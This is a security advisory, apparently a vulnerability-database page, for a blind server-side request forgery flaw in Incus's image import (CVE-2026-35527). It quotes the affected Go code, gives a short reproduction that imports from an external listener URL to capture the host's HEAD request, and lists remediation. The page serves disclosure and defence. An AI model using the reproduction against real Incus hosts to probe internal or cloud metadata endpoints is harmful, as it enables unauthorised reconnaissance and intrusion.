Incus CVE-2026-35527
MEDIUMSeverity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
5DescriptionGitHub Advisory
Summary
A partial implementation of our restricted.images.servers project restriction allows users in such restricted projects to still cause Incus to send HEAD requests to arbitrary endpoints.
The actual image download will be rejected by the project restriction, but the ability to trigger arbitrary HTTP requests inside of the Incus environment can still be used as a way to discover otherwise hidden details about the environment.
Details
The image import flow performs outbound network access to a user-supplied URL before the request is fully validated and before the import is rejected. The URL information helper constructs a HEAD request directly from the supplied source URL and immediately sends it to resolve image metadata.
A host-originated HEAD request is issued from attacker-controlled input during the image import preflight stage. In the observed reproduction, this request is sent before the flow fails on later processing requirements, such as missing image metadata headers. As a result, an authenticated user can coerce the daemon into making blind outbound HEAD requests to arbitrary destinations. This yields a blind server-side request forgery (SSRF) primitive against internal services, unroutable address space, or cloud metadata endpoints reachable by the host. This vulnerability pattern is similar to CVE-2026-24767.
Affected File: https://github.com/lxc/incus/blob/v6.22.0/cmd/incusd/images.go
Affected Code:
func imgPostURLInfo(ctx context.Context, s *state.State, r *http.Request, req api.ImagesPost, op *operations.Operation, project string, budget int64) (*api.Image, error) {
[...]
head, err := http.NewRequest("HEAD", req.Source.URL, nil)
if err != nil {
return nil, err
}
[...]
head.Header.Set("User-Agent", version.UserAgent)
head.Header.Set("Incus-Server-Architectures", strings.Join(architectures, ", "))
head.Header.Set("Incus-Server-Version", version.Version)
raw, err := myhttp.Do(head)
if err != nil {
return nil, err
}
hash := raw.Header.Get("Incus-Image-Hash")
if hash == "" {
return nil, errors.New("Missing Incus-Image-Hash header")
}
url := raw.Header.Get("Incus-Image-URL")
if url == "" {
return nil, errors.New("Missing Incus-Image-URL header")
}
info, _, err := ImageDownload(ctx, r, s, op, &ImageDownloadArgs{
Server: url,
Protocol: "direct",
Alias: hash,
AutoUpdate: req.AutoUpdate,
Public: req.Public,
ProjectName: project,
Budget: budget,
})
[...]
}The following PoC demonstrates that an authenticated user can trigger a host-originated HEAD request to an arbitrary external URL during the image import preflight stage.
Step 1: Select the reproduction project
From an Incus client with access to the target server, switch into the project used for reproduction. In this environment, the selected project was configured as restricted=true with a restrictive restricted.images.servers policy.
Command:
incus project switch restrictedStep 2: Trigger the preflight request to an arbitrary URL
From the same Incus client, attempt to import an image from an attacker-controlled or observable URL. In this example, webhook.site is used as an external listener to capture the host-originated request.
Command:
incus image import https://webhook.site/0270eca3-4197-4194-97b6-1280f1070c3a --alias my-ssrf-imageResult:
Error: Missing Incus-Image-Hash headerStep 3: Verify the outbound HEAD request in the external listener
In the webhook.site request log for the URL above, confirm that the Incus host issued a HEAD request before the import failed. In this reproduction environment, the request originated from a server running Incus v6.22.0.
Result:
HEAD /0270eca3-4197-4194-97b6-1280f1070c3a HTTP/1.1
Host: webhook.site
User-Agent: Incus 6.22 (Linux; x86_64; 6.19.6; Debian GNU/Linux; 13) (zfs 2.4.1-1)
Incus-Server-Version: 6.22
Incus-Server-Architectures: x86_64, i686It is recommended to defer all outbound network interaction associated with URL-based image imports, including metadata preflight requests, until after the supplied URL has passed all validation and policy checks required by the import flow. If the import would later fail or be disallowed, the daemon should reject the request before issuing any network traffic.
Credit
This issue was discovered and reported by the team at 7asecurity (https://7asecurity.com/)
AnalysisAI
Blind server-side request forgery in Incus allows authenticated users to trigger arbitrary HEAD requests to internal or external endpoints during image import preflight validation, bypassing the restricted.images.servers project restriction. While the actual image download is blocked by project policies, the preflight HEAD request executes before validation occurs, enabling attackers to probe internal services, cloud metadata endpoints, or unroutable address space reachable from the Incus host. No public exploit code identified at time of analysis, though proof-of-concept reproduction is documented in the advisory.
Technical ContextAI
The vulnerability exists in the image import URL handler (imgPostURLInfo function in cmd/incusd/images.go) which constructs and immediately sends an HTTP HEAD request to a user-supplied URL to fetch image metadata headers (Incus-Image-Hash and Incus-Image-URL). The root cause is CWE-918 (Server-Side Request Forgery): the preflight HEAD request is issued before the supplied URL is validated against project restrictions or other import requirements. The restricted.images.servers project restriction is only enforced later in the ImageDownload flow, after the outbound request has already been made. This creates a blind SSRF primitive where authenticated attackers can coerce the Incus daemon into making network requests to arbitrary destinations with host-level network access, including internal networks and cloud metadata services.
RemediationAI
Upgrade Incus to version 7.0.0 or later, which implements proper validation ordering to defer preflight HEAD requests until after URL and project-restriction policies are enforced. Vendor-released patch: 7.0.0. If immediate upgrade is not feasible, implement network-level compensating controls: restrict outbound HTTP/HTTPS traffic from Incus daemon to explicitly whitelisted image repositories or internal networks, blocking access to cloud metadata endpoints (169.254.169.254/fd00:ec2::254) and internal service ranges. Additionally, restrict project membership and image-import privileges to trusted users only, and audit image import requests for suspicious external URLs. These controls mitigate blind SSRF but do not eliminate the root vulnerability and should be temporary pending patching.
Same weakness CWE-918 – Server-Side Request Forgery (SSRF)
View allVendor StatusVendor
SUSE
Severity: LowShare
External POC / Exploit Code
Leaving vuln.today
GHSA-8gw4-p4wq-4hcv